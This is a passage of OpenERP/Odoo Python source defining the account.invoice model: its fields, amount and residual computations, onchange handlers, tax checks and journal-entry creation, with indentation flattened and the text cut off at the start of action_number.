import openerp.addons.decimal_precision as dp
# mapping invoice type to journal type
TYPE2JOURNAL = {
'out_invoice': 'sale',
'in_invoice': 'purchase',
'out_refund': 'sale_refund',
'in_refund': 'purchase_refund',
}
# mapping invoice type to refund type
TYPE2REFUND = {
'out_invoice': 'out_refund', # Customer Invoice
'in_invoice': 'in_refund', # Supplier Invoice
'out_refund': 'out_invoice', # Customer Refund
'in_refund': 'in_invoice', # Supplier Refund
}
MAGIC_COLUMNS = ('id', 'create_uid', 'create_date', 'write_uid', 'write_date')
class account_invoice(models.Model):
_name = "account.invoice"
_inherit = ['mail.thread']
_description = "Invoice"
_order = "number desc, id desc"
_track = {
'type': {
},
'state': {
'account.mt_invoice_paid': lambda self, cr, uid, obj, ctx=None: obj.state == 'paid' and obj.type in ('out_invoice', 'out_refund'),
'account.mt_invoice_validated': lambda self, cr, uid, obj, ctx=None: obj.state == 'open' and obj.type in ('out_invoice', 'out_refund'),
},
}
@api.one
@api.depends('invoice_line.price_subtotal', 'tax_line.amount')
def _compute_amount(self):
self.amount_untaxed = sum(line.price_subtotal for line in self.invoice_line)
self.amount_tax = sum(line.amount for line in self.tax_line)
self.amount_total = self.amount_untaxed + self.amount_tax
@api.model
def _default_journal(self):
inv_type = self._context.get('type', 'out_invoice')
inv_types = inv_type if isinstance(inv_type, list) else [inv_type]
company_id = self._context.get('company_id', self.env.user.company_id.id)
domain = [
('type', 'in', filter(None, map(TYPE2JOURNAL.get, inv_types))),
('company_id', '=', company_id),
]
return self.env['account.journal'].search(domain, limit=1)
@api.model
def _default_currency(self):
journal = self._default_journal()
return journal.currency or journal.company_id.currency_id
@api.model
@api.returns('account.analytic.journal', lambda r: r.id)
def _get_journal_analytic(self, inv_type):
""" Return the analytic journal corresponding to the given invoice type. """
type2journal = {'out_invoice': 'sale', 'in_invoice': 'purchase', 'out_refund': 'sale', 'in_refund': 'purchase'}
journal_type = type2journal.get(inv_type, 'sale')
journal = self.env['account.analytic.journal'].search([('type', '=', journal_type)], limit=1)
if not journal:
raise except_orm(_('No Analytic Journal!'),
_("You must define an analytic journal of type '%s'!") % (journal_type,))
return journal[0]
@api.one
@api.depends('account_id', 'move_id.line_id.account_id', 'move_id.line_id.reconcile_id')
def _compute_reconciled(self):
self.reconciled = self.test_paid()
@api.model
def _get_reference_type(self):
return [('none', _('Free Reference'))]
@api.one
@api.depends(
'state', 'currency_id', 'invoice_line.price_subtotal',
'move_id.line_id.account_id.type',
'move_id.line_id.amount_residual',
# Fixes the fact that move_id.line_id.amount_residual, being not stored and old API, doesn't trigger recomputation
'move_id.line_id.reconcile_id',
'move_id.line_id.amount_residual_currency',
'move_id.line_id.currency_id',
'move_id.line_id.reconcile_partial_id.line_partial_ids.invoice.type',
)
# An invoice's residual amount is the sum of its unreconciled move lines and,
# for partially reconciled move lines, their residual amount divided by the
# number of times this reconciliation is used in an invoice (so we split
    # the residual amount among all invoices)
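    # Illustrative figures: a partial reconciliation of 100.0 shared by two
    # invoices of the same type contributes 100.0 / 2 = 50.0 to each
    # invoice's residual.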
def _compute_residual(self):
self.residual = 0.0
# Each partial reconciliation is considered only once for each invoice it appears into,
# and its residual amount is divided by this number of invoices
partial_reconciliations_done = []
for line in self.sudo().move_id.line_id:
if line.account_id.type not in ('receivable', 'payable'):
continue
if line.reconcile_partial_id and line.reconcile_partial_id.id in partial_reconciliations_done:
continue
# Get the correct line residual amount
if line.currency_id == self.currency_id:
line_amount = line.amount_residual_currency if line.currency_id else line.amount_residual
else:
from_currency = line.company_id.currency_id.with_context(date=line.date)
line_amount = from_currency.compute(line.amount_residual, self.currency_id)
# For partially reconciled lines, split the residual amount
if line.reconcile_partial_id:
partial_reconciliation_invoices = set()
for pline in line.reconcile_partial_id.line_partial_ids:
if pline.invoice and self.type == pline.invoice.type:
partial_reconciliation_invoices.update([pline.invoice.id])
line_amount = self.currency_id.round(line_amount / len(partial_reconciliation_invoices))
partial_reconciliations_done.append(line.reconcile_partial_id.id)
self.residual += line_amount
self.residual = max(self.residual, 0.0)
@api.one
@api.depends(
'move_id.line_id.account_id',
'move_id.line_id.reconcile_id.line_id',
'move_id.line_id.reconcile_partial_id.line_partial_ids',
)
def _compute_move_lines(self):
# Give Journal Items related to the payment reconciled to this invoice.
# Return partial and total payments related to the selected invoice.
self.move_lines = self.env['account.move.line']
if not self.move_id:
return
data_lines = self.move_id.line_id.filtered(lambda l: l.account_id == self.account_id)
partial_lines = self.env['account.move.line']
for data_line in data_lines:
if data_line.reconcile_id:
lines = data_line.reconcile_id.line_id
elif data_line.reconcile_partial_id:
lines = data_line.reconcile_partial_id.line_partial_ids
else:
lines = self.env['account.move.line']
partial_lines += data_line
self.move_lines = lines - partial_lines
@api.one
@api.depends(
'move_id.line_id.reconcile_id.line_id',
'move_id.line_id.reconcile_partial_id.line_partial_ids',
)
def _compute_payments(self):
partial_lines = lines = self.env['account.move.line']
for line in self.move_id.line_id:
if line.account_id != self.account_id:
continue
if line.reconcile_id:
lines |= line.reconcile_id.line_id
elif line.reconcile_partial_id:
lines |= line.reconcile_partial_id.line_partial_ids
partial_lines += line
self.payment_ids = (lines - partial_lines).sorted()
name = fields.Char(string='Reference/Description', index=True,
readonly=True, states={'draft': [('readonly', False)]})
origin = fields.Char(string='Source Document',
help="Reference of the document that produced this invoice.",
readonly=True, states={'draft': [('readonly', False)]})
supplier_invoice_number = fields.Char(string='Supplier Invoice Number',
help="The reference of this invoice as provided by the supplier.",
readonly=True, states={'draft': [('readonly', False)]})
type = fields.Selection([
('out_invoice','Customer Invoice'),
('in_invoice','Supplier Invoice'),
('out_refund','Customer Refund'),
('in_refund','Supplier Refund'),
], string='Type', readonly=True, index=True, change_default=True,
default=lambda self: self._context.get('type', 'out_invoice'),
track_visibility='always')
number = fields.Char(related='move_id.name', store=True, readonly=True, copy=False)
internal_number = fields.Char(string='Invoice Number', readonly=True,
default=False, copy=False,
help="Unique number of the invoice, computed automatically when the invoice is created.")
reference = fields.Char(string='Invoice Reference',
help="The partner reference of this invoice.")
reference_type = fields.Selection('_get_reference_type', string='Payment Reference',
required=True, readonly=True, states={'draft': [('readonly', False)]},
default='none')
comment = fields.Text('Additional Information')
state = fields.Selection([
('draft','Draft'),
('proforma','Pro-forma'),
('proforma2','Pro-forma'),
('open','Open'),
('paid','Paid'),
('cancel','Cancelled'),
], string='Status', index=True, readonly=True, default='draft',
track_visibility='onchange', copy=False,
help=" * The 'Draft' status is used when a user is encoding a new and unconfirmed Invoice.\n"
" * The 'Pro-forma' when invoice is in Pro-forma status,invoice does not have an invoice number.\n"
" * The 'Open' status is used when user create invoice,a invoice number is generated.Its in open status till user does not pay invoice.\n"
" * The 'Paid' status is set automatically when the invoice is paid. Its related journal entries may or may not be reconciled.\n"
" * The 'Cancelled' status is used when user cancel invoice.")
sent = fields.Boolean(readonly=True, default=False, copy=False,
help="It indicates that the invoice has been sent.")
date_invoice = fields.Date(string='Invoice Date',
readonly=True, states={'draft': [('readonly', False)]}, index=True,
help="Keep empty to use the current date", copy=False)
date_due = fields.Date(string='Due Date',
readonly=True, states={'draft': [('readonly', False)]}, index=True, copy=False,
help="If you use payment terms, the due date will be computed automatically at the generation "
"of accounting entries. The payment term may compute several due dates, for example 50% "
"now and 50% in one month, but if you want to force a due date, make sure that the payment "
"term is not set on the invoice. If you keep the payment term and the due date empty, it "
"means direct payment.")
partner_id = fields.Many2one('res.partner', string='Partner', change_default=True,
required=True, readonly=True, states={'draft': [('readonly', False)]},
track_visibility='always')
payment_term = fields.Many2one('account.payment.term', string='Payment Terms',
readonly=True, states={'draft': [('readonly', False)]},
help="If you use payment terms, the due date will be computed automatically at the generation "
"of accounting entries. If you keep the payment term and the due date empty, it means direct payment. "
"The payment term may compute several due dates, for example 50% now, 50% in one month.")
period_id = fields.Many2one('account.period', string='Force Period',
domain=[('state', '!=', 'done')], copy=False,
help="Keep empty to use the period of the validation(invoice) date.",
readonly=True, states={'draft': [('readonly', False)]})
account_id = fields.Many2one('account.account', string='Account',
required=True, readonly=True, states={'draft': [('readonly', False)]},
help="The partner account used for this invoice.")
invoice_line = fields.One2many('account.invoice.line', 'invoice_id', string='Invoice Lines',
readonly=True, states={'draft': [('readonly', False)]}, copy=True)
tax_line = fields.One2many('account.invoice.tax', 'invoice_id', string='Tax Lines',
readonly=True, states={'draft': [('readonly', False)]}, copy=True)
move_id = fields.Many2one('account.move', string='Journal Entry',
readonly=True, index=True, ondelete='restrict', copy=False,
help="Link to the automatically generated Journal Items.")
amount_untaxed = fields.Float(string='Subtotal', digits=dp.get_precision('Account'),
store=True, readonly=True, compute='_compute_amount', track_visibility='always')
amount_tax = fields.Float(string='Tax', digits=dp.get_precision('Account'),
store=True, readonly=True, compute='_compute_amount')
amount_total = fields.Float(string='Total', digits=dp.get_precision('Account'),
store=True, readonly=True, compute='_compute_amount')
currency_id = fields.Many2one('res.currency', string='Currency',
required=True, readonly=True, states={'draft': [('readonly', False)]},
default=_default_currency, track_visibility='always')
journal_id = fields.Many2one('account.journal', string='Journal',
required=True, readonly=True, states={'draft': [('readonly', False)]},
default=_default_journal,
domain="[('type', 'in', {'out_invoice': ['sale'], 'out_refund': ['sale_refund'], 'in_refund': ['purchase_refund'], 'in_invoice': ['purchase']}.get(type, [])), ('company_id', '=', company_id)]")
company_id = fields.Many2one('res.company', string='Company', change_default=True,
required=True, readonly=True, states={'draft': [('readonly', False)]},
default=lambda self: self.env['res.company']._company_default_get('account.invoice'))
check_total = fields.Float(string='Verification Total', digits=dp.get_precision('Account'),
readonly=True, states={'draft': [('readonly', False)]}, default=0.0)
reconciled = fields.Boolean(string='Paid/Reconciled',
store=True, readonly=True, compute='_compute_reconciled',
help="It indicates that the invoice has been paid and the journal entry of the invoice has been reconciled with one or several journal entries of payment.")
partner_bank_id = fields.Many2one('res.partner.bank', string='Bank Account',
help='Bank Account Number to which the invoice will be paid. A Company bank account if this is a Customer Invoice or Supplier Refund, otherwise a Partner bank account number.',
readonly=True, states={'draft': [('readonly', False)]})
move_lines = fields.Many2many('account.move.line', string='Entry Lines',
compute='_compute_move_lines')
residual = fields.Float(string='Balance', digits=dp.get_precision('Account'),
compute='_compute_residual', store=True,
help="Remaining amount due.")
payment_ids = fields.Many2many('account.move.line', string='Payments',
compute='_compute_payments')
move_name = fields.Char(string='Journal Entry', readonly=True,
states={'draft': [('readonly', False)]}, copy=False)
user_id = fields.Many2one('res.users', string='Salesperson', track_visibility='onchange',
readonly=True, states={'draft': [('readonly', False)]},
default=lambda self: self.env.user)
fiscal_position = fields.Many2one('account.fiscal.position', string='Fiscal Position',
readonly=True, states={'draft': [('readonly', False)]})
commercial_partner_id = fields.Many2one('res.partner', string='Commercial Entity',
related='partner_id.commercial_partner_id', store=True, readonly=True,
help="The commercial entity that will be used on Journal Entries for this invoice")
_sql_constraints = [
('number_uniq', 'unique(number, company_id, journal_id, type)',
'Invoice Number must be unique per Company!'),
]
@api.model
def fields_view_get(self, view_id=None, view_type=False, toolbar=False, submenu=False):
context = self._context
def get_view_id(xid, name):
try:
return self.env['ir.model.data'].xmlid_to_res_id('account.' + xid, raise_if_not_found=True)
except ValueError:
try:
return self.env['ir.ui.view'].search([('name', '=', name)], limit=1).id
except Exception:
return False # view not found
if context.get('active_model') == 'res.partner' and context.get('active_ids'):
partner = self.env['res.partner'].browse(context['active_ids'])[0]
if not view_type:
view_id = get_view_id('invoice_tree', 'account.invoice.tree')
view_type = 'tree'
elif view_type == 'form':
if partner.supplier and not partner.customer:
view_id = get_view_id('invoice_supplier_form', 'account.invoice.supplier.form')
elif partner.customer and not partner.supplier:
view_id = get_view_id('invoice_form', 'account.invoice.form')
res = super(account_invoice, self).fields_view_get(view_id=view_id, view_type=view_type, toolbar=toolbar, submenu=submenu)
# adapt selection of field journal_id
for field in res['fields']:
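            # NOTE: 'type' in the test below is the Python builtin (always
            # truthy); the intended check was most likely context.get('type').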
if field == 'journal_id' and type:
journal_select = self.env['account.journal']._name_search('', [('type', '=', type)], name_get_uid=1)
res['fields'][field]['selection'] = journal_select
doc = etree.XML(res['arch'])
if context.get('type'):
for node in doc.xpath("//field[@name='partner_bank_id']"):
if context['type'] == 'in_refund':
node.set('domain', "[('partner_id.ref_companies', 'in', [company_id])]")
elif context['type'] == 'out_refund':
node.set('domain', "[('partner_id', '=', partner_id)]")
if view_type == 'search':
if context.get('type') in ('out_invoice', 'out_refund'):
for node in doc.xpath("//group[@name='extended filter']"):
doc.remove(node)
if view_type == 'tree':
partner_string = _('Customer')
if context.get('type') in ('in_invoice', 'in_refund'):
partner_string = _('Supplier')
for node in doc.xpath("//field[@name='reference']"):
node.set('invisible', '0')
for node in doc.xpath("//field[@name='partner_id']"):
node.set('string', partner_string)
res['arch'] = etree.tostring(doc)
return res
@api.multi
def invoice_print(self):
""" Print the invoice and mark it as sent, so that we can see more
easily the next step of the workflow
"""
assert len(self) == 1, 'This option should only be used for a single id at a time.'
self.sent = True
return self.env['report'].get_action(self, 'account.report_invoice')
@api.multi
def action_invoice_sent(self):
""" Open a window to compose an email, with the edi invoice template
message loaded by default
"""
assert len(self) == 1, 'This option should only be used for a single id at a time.'
template = self.env.ref('account.email_template_edi_invoice', False)
compose_form = self.env.ref('mail.email_compose_message_wizard_form', False)
ctx = dict(
default_model='account.invoice',
default_res_id=self.id,
default_use_template=bool(template),
default_template_id=template.id,
default_composition_mode='comment',
mark_invoice_as_sent=True,
)
return {
'name': _('Compose Email'),
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'mail.compose.message',
'views': [(compose_form.id, 'form')],
'view_id': compose_form.id,
'target': 'new',
'context': ctx,
}
@api.multi
def confirm_paid(self):
return self.write({'state': 'paid'})
@api.multi
def unlink(self):
for invoice in self:
if invoice.state not in ('draft', 'cancel'):
raise Warning(_('You cannot delete an invoice which is not draft or cancelled. You should refund it instead.'))
elif invoice.internal_number:
raise Warning(_('You cannot delete an invoice after it has been validated (and received a number). You can set it back to "Draft" state and modify its content, then re-confirm it.'))
return super(account_invoice, self).unlink()
@api.multi
def onchange_partner_id(self, type, partner_id, date_invoice=False,
payment_term=False, partner_bank_id=False, company_id=False):
account_id = False
payment_term_id = False
fiscal_position = False
bank_id = False
if partner_id:
p = self.env['res.partner'].browse(partner_id)
rec_account = p.property_account_receivable
pay_account = p.property_account_payable
if company_id:
if p.property_account_receivable.company_id and \
p.property_account_receivable.company_id.id != company_id and \
p.property_account_payable.company_id and \
p.property_account_payable.company_id.id != company_id:
prop = self.env['ir.property']
rec_dom = [('name', '=', 'property_account_receivable'), ('company_id', '=', company_id)]
pay_dom = [('name', '=', 'property_account_payable'), ('company_id', '=', company_id)]
res_dom = [('res_id', '=', 'res.partner,%s' % partner_id)]
rec_prop = prop.search(rec_dom + res_dom) or prop.search(rec_dom)
pay_prop = prop.search(pay_dom + res_dom) or prop.search(pay_dom)
rec_account = rec_prop.get_by_record(rec_prop)
pay_account = pay_prop.get_by_record(pay_prop)
if not rec_account and not pay_account:
action = self.env.ref('account.action_account_config')
                    msg = _('Cannot find a chart of accounts for this company; you should configure one.\nPlease go to Account Configuration.')
raise RedirectWarning(msg, action.id, _('Go to the configuration panel'))
if type in ('out_invoice', 'out_refund'):
account_id = rec_account.id
payment_term_id = p.property_payment_term.id
else:
account_id = pay_account.id
payment_term_id = p.property_supplier_payment_term.id
fiscal_position = p.property_account_position.id
bank_id = p.bank_ids and p.bank_ids[0].id or False
result = {'value': {
'account_id': account_id,
'payment_term': payment_term_id,
'fiscal_position': fiscal_position,
}}
if type in ('in_invoice', 'in_refund'):
result['value']['partner_bank_id'] = bank_id
if payment_term != payment_term_id:
if payment_term_id:
to_update = self.onchange_payment_term_date_invoice(payment_term_id, date_invoice)
result['value'].update(to_update.get('value', {}))
else:
result['value']['date_due'] = False
if partner_bank_id != bank_id:
to_update = self.onchange_partner_bank(bank_id)
result['value'].update(to_update.get('value', {}))
return result
@api.multi
def onchange_journal_id(self, journal_id=False):
if journal_id:
journal = self.env['account.journal'].browse(journal_id)
return {
'value': {
'currency_id': journal.currency.id or journal.company_id.currency_id.id,
'company_id': journal.company_id.id,
}
}
return {}
@api.multi
def onchange_payment_term_date_invoice(self, payment_term_id, date_invoice):
if not date_invoice:
date_invoice = fields.Date.context_today(self)
if not payment_term_id:
            # When no payment term is defined, keep the due date entered by
            # the user (falling back to the invoice date)
return {'value': {'date_due': self.date_due or date_invoice}}
pterm = self.env['account.payment.term'].browse(payment_term_id)
pterm_list = pterm.compute(value=1, date_ref=date_invoice)[0]
if pterm_list:
return {'value': {'date_due': max(line[0] for line in pterm_list)}}
else:
raise except_orm(_('Insufficient Data!'),
                _("The supplier's payment term does not have a payment term line."))
@api.multi
def onchange_invoice_line(self, lines):
return {}
@api.multi
def onchange_partner_bank(self, partner_bank_id=False):
return {'value': {}}
@api.multi
def onchange_company_id(self, company_id, part_id, type, invoice_line, currency_id):
# TODO: add the missing context parameter when forward-porting in trunk
# so we can remove this hack!
self = self.with_context(self.env['res.users'].context_get())
values = {}
domain = {}
if company_id and part_id and type:
p = self.env['res.partner'].browse(part_id)
if p.property_account_payable and p.property_account_receivable and \
p.property_account_payable.company_id.id != company_id and \
p.property_account_receivable.company_id.id != company_id:
prop = self.env['ir.property']
rec_dom = [('name', '=', 'property_account_receivable'), ('company_id', '=', company_id)]
pay_dom = [('name', '=', 'property_account_payable'), ('company_id', '=', company_id)]
res_dom = [('res_id', '=', 'res.partner,%s' % part_id)]
rec_prop = prop.search(rec_dom + res_dom) or prop.search(rec_dom)
pay_prop = prop.search(pay_dom + res_dom) or prop.search(pay_dom)
rec_account = rec_prop.get_by_record(rec_prop)
pay_account = pay_prop.get_by_record(pay_prop)
if not rec_account and not pay_account:
action = self.env.ref('account.action_account_config')
                    msg = _('Cannot find a chart of accounts for this company; you should configure one.\nPlease go to Account Configuration.')
raise RedirectWarning(msg, action.id, _('Go to the configuration panel'))
if type in ('out_invoice', 'out_refund'):
acc_id = rec_account.id
else:
acc_id = pay_account.id
                values = {'account_id': acc_id}
if self:
if company_id:
for line in self.invoice_line:
if not line.account_id:
continue
if line.account_id.company_id.id == company_id:
continue
accounts = self.env['account.account'].search([('name', '=', line.account_id.name), ('company_id', '=', company_id)])
if not accounts:
action = self.env.ref('account.action_account_config')
                        msg = _('Cannot find a chart of accounts for this company; you should configure one.\nPlease go to Account Configuration.')
raise RedirectWarning(msg, action.id, _('Go to the configuration panel'))
line.write({'account_id': accounts[-1].id})
else:
for line_cmd in invoice_line or []:
if len(line_cmd) >= 3 and isinstance(line_cmd[2], dict):
line = self.env['account.account'].browse(line_cmd[2]['account_id'])
if line.company_id.id != company_id:
raise except_orm(
_('Configuration Error!'),
_("Invoice line account's company and invoice's company does not match.")
)
if company_id and type:
journal_type = TYPE2JOURNAL[type]
journals = self.env['account.journal'].search([('type', '=', journal_type), ('company_id', '=', company_id)])
if journals:
values['journal_id'] = journals[0].id
journal_defaults = self.env['ir.values'].get_defaults_dict('account.invoice', 'type=%s' % type)
if 'journal_id' in journal_defaults:
values['journal_id'] = journal_defaults['journal_id']
if not values.get('journal_id'):
field_desc = journals.fields_get(['type'])
type_label = next(t for t, label in field_desc['type']['selection'] if t == journal_type)
action = self.env.ref('account.action_account_journal_form')
                msg = _('Cannot find any account journal of type "%s" for this company; you should create one.\nPlease go to Journal Configuration.') % type_label
raise RedirectWarning(msg, action.id, _('Go to the configuration panel'))
domain = {'journal_id': [('id', 'in', journals.ids)]}
return {'value': values, 'domain': domain}
@api.multi
def action_cancel_draft(self):
# go from canceled state to draft state
self.write({'state': 'draft'})
self.delete_workflow()
self.create_workflow()
return True
@api.one
@api.returns('ir.ui.view')
def get_formview_id(self):
""" Update form view id of action to open the invoice """
if self.type == 'in_invoice':
return self.env.ref('account.invoice_supplier_form')
else:
return self.env.ref('account.invoice_form')
@api.multi
def move_line_id_payment_get(self):
# return the move line ids with the same account as the invoice self
if not self.id:
return []
query = """ SELECT l.id
FROM account_move_line l, account_invoice i
WHERE i.id = %s AND l.move_id = i.move_id AND l.account_id = i.account_id
"""
self._cr.execute(query, (self.id,))
return [row[0] for row in self._cr.fetchall()]
@api.multi
def test_paid(self):
# check whether all corresponding account move lines are reconciled
line_ids = self.move_line_id_payment_get()
if not line_ids:
return False
query = "SELECT reconcile_id FROM account_move_line WHERE id IN %s"
self._cr.execute(query, (tuple(line_ids),))
return all(row[0] for row in self._cr.fetchall())
@api.multi
def button_reset_taxes(self):
account_invoice_tax = self.env['account.invoice.tax']
ctx = dict(self._context)
for invoice in self:
self._cr.execute("DELETE FROM account_invoice_tax WHERE invoice_id=%s AND manual is False", (invoice.id,))
self.invalidate_cache()
partner = invoice.partner_id
if partner.lang:
ctx['lang'] = partner.lang
for taxe in account_invoice_tax.compute(invoice.with_context(ctx)).values():
account_invoice_tax.create(taxe)
# dummy write on self to trigger recomputations
return self.with_context(ctx).write({'invoice_line': []})
@api.multi
def button_compute(self, set_total=False):
self.button_reset_taxes()
for invoice in self:
if set_total:
invoice.check_total = invoice.amount_total
return True
@api.multi
def _get_analytic_lines(self):
""" Return a list of dict for creating analytic lines for self[0] """
company_currency = self.company_id.currency_id
sign = 1 if self.type in ('out_invoice', 'in_refund') else -1
iml = self.env['account.invoice.line'].move_line_get(self.id)
for il in iml:
if il['account_analytic_id']:
if self.type in ('in_invoice', 'in_refund'):
ref = self.reference
else:
ref = self.number
if not self.journal_id.analytic_journal_id:
raise except_orm(_('No Analytic Journal!'),
_("You have to define an analytic journal on the '%s' journal!") % (self.journal_id.name,))
currency = self.currency_id.with_context(date=self.date_invoice)
il['analytic_lines'] = [(0,0, {
'name': il['name'],
'date': self.date_invoice,
'account_id': il['account_analytic_id'],
'unit_amount': il['quantity'],
'amount': currency.compute(il['price'], company_currency) * sign,
'product_id': il['product_id'],
'product_uom_id': il['uos_id'],
'general_account_id': il['account_id'],
'journal_id': self.journal_id.analytic_journal_id.id,
'ref': ref,
})]
return iml
@api.multi
def action_date_assign(self):
for inv in self:
res = inv.onchange_payment_term_date_invoice(inv.payment_term.id, inv.date_invoice)
if res and res.get('value'):
inv.write(res['value'])
return True
@api.multi
def finalize_invoice_move_lines(self, move_lines):
""" finalize_invoice_move_lines(move_lines) -> move_lines
Hook method to be overridden in additional modules to verify and
possibly alter the move lines to be created by an invoice, for
special cases.
:param move_lines: list of dictionaries with the account.move.lines (as for create())
:return: the (possibly updated) final move_lines to create for this invoice
"""
return move_lines
@api.multi
def check_tax_lines(self, compute_taxes):
account_invoice_tax = self.env['account.invoice.tax']
company_currency = self.company_id.currency_id
if not self.tax_line:
for tax in compute_taxes.values():
account_invoice_tax.create(tax)
else:
tax_key = []
precision = self.env['decimal.precision'].precision_get('Account')
for tax in self.tax_line:
if tax.manual:
continue
key = (tax.tax_code_id.id, tax.base_code_id.id, tax.account_id.id)
tax_key.append(key)
if key not in compute_taxes:
raise except_orm(_('Warning!'), _('Global taxes defined, but they are not in invoice lines !'))
base = compute_taxes[key]['base']
if float_compare(abs(base - tax.base), company_currency.rounding, precision_digits=precision) == 1:
raise except_orm(_('Warning!'), _('Tax base different!\nClick on compute to update the tax base.'))
for key in compute_taxes:
if key not in tax_key:
raise except_orm(_('Warning!'), _('Taxes are missing!\nClick on compute button.'))
@api.multi
def compute_invoice_totals(self, company_currency, ref, invoice_move_lines):
total = 0
total_currency = 0
for line in invoice_move_lines:
if self.currency_id != company_currency:
currency = self.currency_id.with_context(date=self.date_invoice or fields.Date.context_today(self))
line['currency_id'] = currency.id
line['amount_currency'] = line['price']
line['price'] = currency.compute(line['price'], company_currency)
else:
line['currency_id'] = False
line['amount_currency'] = False
line['ref'] = ref
if self.type in ('out_invoice','in_refund'):
total += line['price']
total_currency += line['amount_currency'] or line['price']
line['price'] = - line['price']
else:
total -= line['price']
total_currency -= line['amount_currency'] or line['price']
return total, total_currency, invoice_move_lines
def inv_line_characteristic_hashcode(self, invoice_line):
"""Overridable hashcode generation for invoice lines. Lines having the same hashcode
will be grouped together if the journal has the 'group line' option. Of course a module
can add fields to invoice lines that would need to be tested too before merging lines
or not."""
return "%s-%s-%s-%s-%s" % (
invoice_line['account_id'],
invoice_line.get('tax_code_id', 'False'),
invoice_line.get('product_id', 'False'),
invoice_line.get('analytic_account_id', 'False'),
invoice_line.get('date_maturity', 'False'),
)
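    # Example hashcode (hypothetical values): "1042-False-7-False-2017-01-31";
    # lines producing the same string are merged by group_lines() below.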
def group_lines(self, iml, line):
"""Merge account move lines (and hence analytic lines) if invoice line hashcodes are equals"""
if self.journal_id.group_invoice_lines:
line2 = {}
for x, y, l in line:
tmp = self.inv_line_characteristic_hashcode(l)
if tmp in line2:
am = line2[tmp]['debit'] - line2[tmp]['credit'] + (l['debit'] - l['credit'])
line2[tmp]['debit'] = (am > 0) and am or 0.0
line2[tmp]['credit'] = (am < 0) and -am or 0.0
line2[tmp]['tax_amount'] += l['tax_amount']
line2[tmp]['analytic_lines'] += l['analytic_lines']
else:
line2[tmp] = l
line = []
for key, val in line2.items():
line.append((0,0,val))
return line
@api.multi
def action_move_create(self):
""" Creates invoice related analytics and financial move lines """
account_invoice_tax = self.env['account.invoice.tax']
account_move = self.env['account.move']
for inv in self:
if not inv.journal_id.sequence_id:
raise except_orm(_('Error!'), _('Please define sequence on the journal related to this invoice.'))
if not inv.invoice_line:
raise except_orm(_('No Invoice Lines!'), _('Please create some invoice lines.'))
if inv.move_id:
continue
ctx = dict(self._context, lang=inv.partner_id.lang)
if not inv.date_invoice:
inv.with_context(ctx).write({'date_invoice': fields.Date.context_today(self)})
date_invoice = inv.date_invoice
company_currency = inv.company_id.currency_id
# create the analytical lines, one move line per invoice line
iml = inv._get_analytic_lines()
# check if taxes are all computed
compute_taxes = account_invoice_tax.compute(inv.with_context(lang=inv.partner_id.lang))
inv.check_tax_lines(compute_taxes)
# I disabled the check_total feature
if self.env['res.users'].has_group('account.group_supplier_inv_check_total'):
if inv.type in ('in_invoice', 'in_refund') and abs(inv.check_total - inv.amount_total) >= (inv.currency_id.rounding / 2.0):
raise except_orm(_('Bad Total!'), _('Please verify the price of the invoice!\nThe encoded total does not match the computed total.'))
if inv.payment_term:
total_fixed = total_percent = 0
for line in inv.payment_term.line_ids:
if line.value == 'fixed':
total_fixed += line.value_amount
if line.value == 'procent':
total_percent += line.value_amount
total_fixed = (total_fixed * 100) / (inv.amount_total or 1.0)
if (total_fixed + total_percent) > 100:
raise except_orm(_('Error!'), _("Cannot create the invoice.\nThe related payment term is probably misconfigured as it gives a computed amount greater than the total invoiced amount. In order to avoid rounding issues, the latest line of your payment term must be of type 'balance'."))
# one move line per tax line
iml += account_invoice_tax.move_line_get(inv.id)
if inv.type in ('in_invoice', 'in_refund'):
ref = inv.reference
else:
ref = inv.number
diff_currency = inv.currency_id != company_currency
# create one move line for the total and possibly adjust the other lines amount
total, total_currency, iml = inv.with_context(ctx).compute_invoice_totals(company_currency, ref, iml)
name = inv.supplier_invoice_number or inv.name or '/'
totlines = []
if inv.payment_term:
totlines = inv.with_context(ctx).payment_term.compute(total, date_invoice)[0]
if totlines:
res_amount_currency = total_currency
ctx['date'] = date_invoice
for i, t in enumerate(totlines):
if inv.currency_id != company_currency:
amount_currency = company_currency.with_context(ctx).compute(t[1], inv.currency_id)
else:
amount_currency = False
# last line: add the diff
res_amount_currency -= amount_currency or 0
if i + 1 == len(totlines):
amount_currency += res_amount_currency
iml.append({
'type': 'dest',
'name': name,
'price': t[1],
'account_id': inv.account_id.id,
'date_maturity': t[0],
'amount_currency': diff_currency and amount_currency,
'currency_id': diff_currency and inv.currency_id.id,
'ref': ref,
})
else:
iml.append({
'type': 'dest',
'name': name,
'price': total,
'account_id': inv.account_id.id,
'date_maturity': inv.date_due,
'amount_currency': diff_currency and total_currency,
'currency_id': diff_currency and inv.currency_id.id,
'ref': ref
})
date = date_invoice
part = self.env['res.partner']._find_accounting_partner(inv.partner_id)
line = [(0, 0, self.line_get_convert(l, part.id, date)) for l in iml]
line = inv.group_lines(iml, line)
journal = inv.journal_id.with_context(ctx)
if journal.centralisation:
raise except_orm(_('User Error!'),
_('You cannot create an invoice on a centralized journal. Uncheck the centralized counterpart box in the related journal from the configuration menu.'))
line = inv.finalize_invoice_move_lines(line)
move_vals = {
'ref': inv.reference or inv.name,
'line_id': line,
'journal_id': journal.id,
'date': inv.date_invoice,
'narration': inv.comment,
'company_id': inv.company_id.id,
}
ctx['company_id'] = inv.company_id.id
period = inv.period_id
if not period:
period = period.with_context(ctx).find(date_invoice)[:1]
if period:
move_vals['period_id'] = period.id
for i in line:
i[2]['period_id'] = period.id
ctx['invoice'] = inv
move = account_move.with_context(ctx).create(move_vals)
# make the invoice point to that move
vals = {
'move_id': move.id,
'period_id': period.id,
'move_name': move.name,
}
inv.with_context(ctx).write(vals)
# Pass invoice in context in method post: used if you want to get the same
# account move reference when creating the same invoice after a cancelled one:
move.post()
self._log_event()
return True
@api.multi
def invoice_validate(self):
return self.write({'state': 'open'})
@api.model
def line_get_convert(self, line, part, date):
return {
'date_maturity': line.get('date_maturity', False),
'partner_id': part,
'name': line['name'][:64],
'date': date,
'debit': line['price']>0 and line['price'],
'credit': line['price']<0 and -line['price'],
'account_id': line['account_id'],
'analytic_lines': line.get('analytic_lines', []),
'amount_currency': line['price']>0 and abs(line.get('amount_currency', False)) or -abs(line.get('amount_currency', False)),
'currency_id': line.get('currency_id', False),
'tax_code_id': line.get('tax_code_id', False),
'tax_amount': line.get('tax_amount', False),
'ref': line.get('ref', False),
'quantity': line.get('quantity',1.00),
'product_id': line.get('product_id', False),
'product_uom_id': line.get('uos_id', False),
'analytic_account_id': line.get('account_analytic_id', False),
}
@api.multi
def action_number(self):
